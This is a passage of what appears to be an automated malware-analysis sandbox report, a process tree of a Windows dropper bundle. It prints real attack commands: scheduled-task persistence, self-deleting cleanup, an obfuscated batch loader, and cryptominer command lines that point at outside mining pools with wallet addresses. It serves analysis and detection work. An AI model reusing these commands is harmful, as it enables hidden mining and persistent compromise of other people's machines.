        schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"'
        13⤵
        Creates scheduled task(s)
        
        PID:5376
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        12⤵
        
        PID:5220
        
        C:\Users\Admin\AppData\Local\Temp\Services.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Services.exe"
        12⤵
        Suspicious use of SetThreadContext
        
        PID:6700
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"' & exit
        13⤵
        
        PID:2324
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"'
        14⤵
        Creates scheduled task(s)
        
        PID:992
        
        C:\Windows\System32\conhost.exe
        
        C:\Windows/System32\conhost.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-asia1.nanopool.org:14444 --user=42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s --pass= --cpu-max-threads-hint=60 --donate-level=5 --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth
        13⤵
        
        PID:6784
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Thu21b9847cb6727.exe
        5⤵
        
        PID:4212
      - C:\Users\Admin\AppData\Local\Temp\7zS4C32F534\Thu21b9847cb6727.exe
        
        Thu21b9847cb6727.exe
        6⤵
        Executes dropped EXE
        
        PID:4688
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Thu214ce31cede21.exe
        5⤵
        
        PID:3260
      - C:\Users\Admin\AppData\Local\Temp\7zS4C32F534\Thu214ce31cede21.exe
        
        Thu214ce31cede21.exe
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks processor information in registry
        Modifies system certificate store
        
        PID:4592
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im Thu214ce31cede21.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zS4C32F534\Thu214ce31cede21.exe" & del C:\ProgramData\*.dll & exit
        7⤵
        
        PID:6172
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im Thu214ce31cede21.exe /f
        8⤵
        Kills process with taskkill
        
        PID:7636
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        8⤵
        Delays execution with timeout.exe
        
        PID:4240
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Thu214aaca5625.exe
        5⤵
        
        PID:4460
      - C:\Users\Admin\AppData\Local\Temp\7zS4C32F534\Thu214aaca5625.exe
        
        Thu214aaca5625.exe
        6⤵
        Executes dropped EXE
        
        PID:800
        
        C:\Users\Admin\AppData\Local\Temp\is-P7VAR.tmp\Thu214aaca5625.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-P7VAR.tmp\Thu214aaca5625.tmp" /SL5="$60030,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS4C32F534\Thu214aaca5625.exe"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks whether UAC is enabled
        
        PID:1756
        
        C:\Users\Admin\AppData\Local\Temp\is-P06B2.tmp\46807GHF____.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-P06B2.tmp\46807GHF____.exe" /S /UID=burnerch2
        8⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Adds Run key to start application
        Drops file in Program Files directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:4816
        
        C:\Program Files\MSBuild\KBGWBIPSDD\ultramediaburner.exe
        
        "C:\Program Files\MSBuild\KBGWBIPSDD\ultramediaburner.exe" /VERYSILENT
        9⤵
        Executes dropped EXE
        
        PID:6712
        
        C:\Users\Admin\AppData\Local\Temp\is-SE32A.tmp\ultramediaburner.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-SE32A.tmp\ultramediaburner.tmp" /SL5="$303B2,281924,62464,C:\Program Files\MSBuild\KBGWBIPSDD\ultramediaburner.exe" /VERYSILENT
        10⤵
        Executes dropped EXE
        Checks whether UAC is enabled
        Drops file in Program Files directory
        Suspicious use of FindShellTrayWindow
        
        PID:6852
        
        C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
        
        "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
        11⤵
        Executes dropped EXE
        Checks whether UAC is enabled
        
        PID:3528
        
        C:\Users\Admin\AppData\Local\Temp\5c-48318-bb1-c2b9c-124e775b676e9\Qasuxyfaba.exe
        
        "C:\Users\Admin\AppData\Local\Temp\5c-48318-bb1-c2b9c-124e775b676e9\Qasuxyfaba.exe"
        9⤵
        Executes dropped EXE
        Checks computer location settings
        
        PID:6868
        
        C:\Users\Admin\AppData\Local\Temp\56-e562a-76e-e58a0-7ce7b903c31c6\Leshilakuko.exe
        
        "C:\Users\Admin\AppData\Local\Temp\56-e562a-76e-e58a0-7ce7b903c31c6\Leshilakuko.exe"
        9⤵
        Executes dropped EXE
        Checks whether UAC is enabled
        
        PID:6976
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uhr224py.51u\GcleanerEU.exe /eufive & exit
        10⤵
        
        PID:7312
        
        C:\Users\Admin\AppData\Local\Temp\uhr224py.51u\GcleanerEU.exe
        
        C:\Users\Admin\AppData\Local\Temp\uhr224py.51u\GcleanerEU.exe /eufive
        11⤵
        Executes dropped EXE
        
        PID:7848
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4gppif2j.swb\installer.exe /qn CAMPAIGN="654" & exit
        10⤵
        
        PID:7416
        
        C:\Users\Admin\AppData\Local\Temp\4gppif2j.swb\installer.exe
        
        C:\Users\Admin\AppData\Local\Temp\4gppif2j.swb\installer.exe /qn CAMPAIGN="654"
        11⤵
        Loads dropped DLL
        Checks whether UAC is enabled
        Enumerates connected drives
        Modifies system certificate store
        Suspicious use of FindShellTrayWindow
        
        PID:7928
        
        C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\4gppif2j.swb\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\4gppif2j.swb\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1631046640 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
        12⤵
        
        PID:7820
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pw1sul1l.51o\anyname.exe & exit
        10⤵
        
        PID:7800
        
        C:\Users\Admin\AppData\Local\Temp\pw1sul1l.51o\anyname.exe
        
        C:\Users\Admin\AppData\Local\Temp\pw1sul1l.51o\anyname.exe
        11⤵
        
        PID:1220
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sm5xteef.cd2\gcleaner.exe /mixfive & exit
        10⤵
        
        PID:8108
        
        C:\Users\Admin\AppData\Local\Temp\sm5xteef.cd2\gcleaner.exe
        
        C:\Users\Admin\AppData\Local\Temp\sm5xteef.cd2\gcleaner.exe /mixfive
        11⤵
        
        PID:3568
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\45tckkfe.lpl\autosubplayer.exe /S & exit
        10⤵
        Checks whether UAC is enabled
        Suspicious use of SetWindowsHookEx
        
        PID:7048
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Thu2102ff6cfe07c.exe
        5⤵
        
        PID:1008
      - C:\Users\Admin\AppData\Local\Temp\7zS4C32F534\Thu2102ff6cfe07c.exe
        
        Thu2102ff6cfe07c.exe
        6⤵
        Executes dropped EXE
        
        PID:4644
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Thu21568b0ab8.exe
        5⤵
        
        PID:4024
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Thu21df5caa1b78de6.exe /mixone
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3452
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Thu2156de5489c19.exe
        5⤵
        
        PID:3212
- C:\Users\Admin\AppData\Local\Temp\36AC.exe
  C:\Users\Admin\AppData\Local\Temp\36AC.exe
  2⤵
  PID:6328
- C:\Users\Admin\AppData\Local\Temp\6232.exe
  C:\Users\Admin\AppData\Local\Temp\6232.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:6928
- - C:\Users\Admin\AppData\Local\Temp\6232.exe
    C:\Users\Admin\AppData\Local\Temp\6232.exe
    3⤵
    - Adds Run key to start application
    PID:5280
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Users\Admin\AppData\Local\4d20de31-34ce-48a6-b190-0d1ae71ae326" /deny *S-1-1-0:(OI)(CI)(DE,DC)
      4⤵
      Modifies file permissions
      PID:4336
  - - C:\Users\Admin\AppData\Local\Temp\6232.exe
      "C:\Users\Admin\AppData\Local\Temp\6232.exe" --Admin IsNotAutoStart IsNotTask
      4⤵
      PID:5452
    - - C:\Users\Admin\AppData\Local\Temp\6232.exe
        
        "C:\Users\Admin\AppData\Local\Temp\6232.exe" --Admin IsNotAutoStart IsNotTask
        5⤵
        
        PID:1412
      - C:\Users\Admin\AppData\Local\49ca208a-fd60-468c-b904-6bee8fecca7a\build2.exe
        
        "C:\Users\Admin\AppData\Local\49ca208a-fd60-468c-b904-6bee8fecca7a\build2.exe"
        6⤵
        
        PID:800
        
        C:\Users\Admin\AppData\Local\49ca208a-fd60-468c-b904-6bee8fecca7a\build2.exe
        
        "C:\Users\Admin\AppData\Local\49ca208a-fd60-468c-b904-6bee8fecca7a\build2.exe"
        7⤵
        
        PID:7100
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\49ca208a-fd60-468c-b904-6bee8fecca7a\build2.exe" & del C:\ProgramData\*.dll & exit
        8⤵
        
        PID:7436
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im build2.exe /f
        9⤵
        Kills process with taskkill
        
        PID:5796
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        9⤵
        Delays execution with timeout.exe
        
        PID:4240
      - C:\Users\Admin\AppData\Local\49ca208a-fd60-468c-b904-6bee8fecca7a\build3.exe
        
        "C:\Users\Admin\AppData\Local\49ca208a-fd60-468c-b904-6bee8fecca7a\build3.exe"
        6⤵
        
        PID:5252
        
        C:\Users\Admin\AppData\Local\49ca208a-fd60-468c-b904-6bee8fecca7a\build3.exe
        
        "C:\Users\Admin\AppData\Local\49ca208a-fd60-468c-b904-6bee8fecca7a\build3.exe"
        7⤵
        
        PID:6940
        
        C:\Windows\SysWOW64\schtasks.exe
        
        /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
        8⤵
        Creates scheduled task(s)
        
        PID:6880
- C:\Users\Admin\AppData\Local\Temp\DACE.exe
  C:\Users\Admin\AppData\Local\Temp\DACE.exe
  2⤵
  PID:5916
- - C:\Users\Admin\AppData\Local\Temp\uohv226oMH.exe
    "C:\Users\Admin\AppData\Local\Temp\uohv226oMH.exe"
    3⤵
    PID:6420
  - - C:\Windows\SysWOW64\schtasks.exe
      /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe"
      4⤵
      Creates scheduled task(s)
      PID:4336
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\DACE.exe"
    3⤵
    PID:7316
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /T 10 /NOBREAK
      4⤵
      Delays execution with timeout.exe
      PID:2692
- C:\Users\Admin\AppData\Local\Temp\6EC8.exe
  C:\Users\Admin\AppData\Local\Temp\6EC8.exe
  2⤵
  PID:688
- C:\Users\Admin\AppData\Local\Temp\7AC5.exe
  C:\Users\Admin\AppData\Local\Temp\7AC5.exe
  2⤵
  PID:4164
- C:\Users\Admin\AppData\Local\Temp\E090.exe
  C:\Users\Admin\AppData\Local\Temp\E090.exe
  2⤵
  PID:6112

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2696

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
PID:2680

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:2572
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k SystemNetworkService
  2⤵
  - Drops file in System32 directory
  - Checks processor information in registry
  - Modifies data under HKEY_USERS
  - Modifies registry class
  PID:5176

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
PID:2372

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2360

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1400

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1380

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1176

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1108

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
- Drops file in System32 directory
PID:1048
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  2⤵
  PID:7952
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    3⤵
    PID:4248
  - - C:\Windows\SysWOW64\schtasks.exe
      /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
      4⤵
      Creates scheduled task(s)
      PID:6440
- C:\Users\Admin\AppData\Roaming\diwujst
  C:\Users\Admin\AppData\Roaming\diwujst
  2⤵
  PID:5276
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe
  2⤵
  PID:6124

C:\Users\Admin\AppData\Local\Temp\7zS4C32F534\Thu21df5caa1b78de6.exe
Thu21df5caa1b78de6.exe /mixone
1⤵
- Executes dropped EXE
PID:4084
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4084 -s 656
  2⤵
  - Program crash
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2276
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4084 -s 668
  2⤵
  - Program crash
  PID:4296
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4084 -s 676
  2⤵
  - Program crash
  PID:5368
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4084 -s 720
  2⤵
  - Program crash
  PID:5744
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4084 -s 880
  2⤵
  - Program crash
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4296
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4084 -s 936
  2⤵
  - Program crash
  PID:1076
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4084 -s 1092
  2⤵
  - Suspicious use of NtCreateProcessExOtherParentProcess
  - Program crash
  PID:6380

C:\Users\Admin\AppData\Local\Temp\7zS4C32F534\Thu2156de5489c19.exe
Thu2156de5489c19.exe
1⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
PID:4616
- C:\Users\Admin\AppData\Local\Temp\tmp9A13_tmp.exe
  "C:\Users\Admin\AppData\Local\Temp\tmp9A13_tmp.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Checks whether UAC is enabled
  PID:1644
- - C:\Windows\SysWOW64\dllhost.exe
    dllhost.exe
    3⤵
    PID:3604
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c cmd < Attesa.wmv
    3⤵
    PID:3940
  - - C:\Windows\SysWOW64\cmd.exe
      cmd
      4⤵
      PID:5704
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /R "^VksJcWfNcDMqfgfCCoOQaENLrlkioAEZRevWUFgpnuTZyylQxdxsqDodbFGlKiEVZMohRaHWUFajKOGYZxNRyhZgTymgZtndBYqaWXYwInbclWFIZIldx$" Braccio.wmv
        5⤵
        
        PID:6492
    - - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
        
        Adorarti.exe.com u
        5⤵
        
        PID:4868
      - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
        6⤵
        Executes dropped EXE
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:4992
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
        7⤵
        Executes dropped EXE
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:4344
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
        8⤵
        Executes dropped EXE
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:7300
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
        9⤵
        Executes dropped EXE
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:7716
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
        10⤵
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:7200
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
        11⤵
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:7696
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
        12⤵
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:7544
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
        13⤵
        Drops startup file
        Suspicious use of SendNotifyMessage
        
        PID:512
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping localhost
        5⤵
        Runs ping.exe
        
        PID:2668

C:\Users\Admin\AppData\Local\Temp\7zS4C32F534\Thu21568b0ab8.exe
Thu21568b0ab8.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:848
- C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
  "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
  2⤵
  - Executes dropped EXE
  PID:1916
- - C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe
    "C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2876
  - - C:\ProgramData\439525.exe
      "C:\ProgramData\439525.exe"
      4⤵
      Executes dropped EXE
      PID:5712
  - - C:\ProgramData\7572993.exe
      "C:\ProgramData\7572993.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: SetClipboardViewer
      PID:5900
  - - C:\ProgramData\6146857.exe
      "C:\ProgramData\6146857.exe"
      4⤵
      Executes dropped EXE
      PID:5800
  - - C:\ProgramData\8475933.exe
      "C:\ProgramData\8475933.exe"
      4⤵
      Executes dropped EXE
      PID:6104
- - C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
    "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
    3⤵
    - Executes dropped EXE
    PID:1144
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
      4⤵
      PID:1388
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        5⤵
        Creates scheduled task(s)
        
        PID:7136
  - - C:\Users\Admin\AppData\Roaming\services64.exe
      "C:\Users\Admin\AppData\Roaming\services64.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      PID:6792
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        5⤵
        
        PID:4428
      - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        6⤵
        Creates scheduled task(s)
        
        PID:5080
    - - C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        5⤵
        
        PID:5736
    - - C:\Windows\explorer.exe
        
        C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
        5⤵
        
        PID:7832
- - C:\Users\Admin\AppData\Local\Temp\2.exe
    "C:\Users\Admin\AppData\Local\Temp\2.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:4924
  - - C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
      "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
      4⤵
      Executes dropped EXE
      PID:5312
    - - C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        5⤵
        
        PID:5428
- - C:\Users\Admin\AppData\Local\Temp\setup.exe
    "C:\Users\Admin\AppData\Local\Temp\setup.exe"
    3⤵
    - Executes dropped EXE
    - Checks whether UAC is enabled
    PID:3424
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3424 -s 768
      4⤵
      Program crash
      PID:5752
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3424 -s 840
      4⤵
      Program crash
      PID:6084
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3424 -s 892
      4⤵
      Program crash
      PID:2380
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3424 -s 896
      4⤵
      Program crash
      PID:5352
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3424 -s 976
      4⤵
      Program crash
      PID:4128
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3424 -s 1016
      4⤵
      Program crash
      PID:5272
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3424 -s 1152
      4⤵
      Suspicious use of NtCreateProcessExOtherParentProcess
      Program crash
      PID:1816
- - C:\Users\Admin\AppData\Local\Temp\udptest.exe
    "C:\Users\Admin\AppData\Local\Temp\udptest.exe"
    3⤵
    - Executes dropped EXE
    PID:4492
- - C:\Users\Admin\AppData\Local\Temp\DVORAK.exe
    "C:\Users\Admin\AppData\Local\Temp\DVORAK.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:4432
  - - C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 4432 -s 1568
      4⤵
      Program crash
      PID:5784
- - C:\Users\Admin\AppData\Local\Temp\setup_2.exe
    "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
    3⤵
    - Executes dropped EXE
    PID:2632
  - - C:\Users\Admin\AppData\Local\Temp\is-OT753.tmp\setup_2.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-OT753.tmp\setup_2.tmp" /SL5="$10328,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:752
    - - C:\Users\Admin\AppData\Local\Temp\setup_2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
        5⤵
        Executes dropped EXE
        
        PID:5412
      - C:\Users\Admin\AppData\Local\Temp\is-JETKC.tmp\setup_2.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-JETKC.tmp\setup_2.tmp" /SL5="$2039C,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks whether UAC is enabled
        Drops file in Program Files directory
        Suspicious use of FindShellTrayWindow
        
        PID:5628
- - C:\Users\Admin\AppData\Local\Temp\3002.exe
    "C:\Users\Admin\AppData\Local\Temp\3002.exe"
    3⤵
    - Executes dropped EXE
    PID:4796
  - - C:\Users\Admin\AppData\Local\Temp\3002.exe
      "C:\Users\Admin\AppData\Local\Temp\3002.exe" -a
      4⤵
      Executes dropped EXE
      PID:5860
- - C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
    "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
    3⤵
    - Executes dropped EXE
    PID:3904
- - C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
    "C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
    3⤵
    - Executes dropped EXE
    PID:2652

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Loads dropped DLL
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:744

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:1816

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s BITS
1⤵
- Modifies data under HKEY_USERS
PID:5956

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5164

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:3328

C:\Windows\system32\rundll32.exe
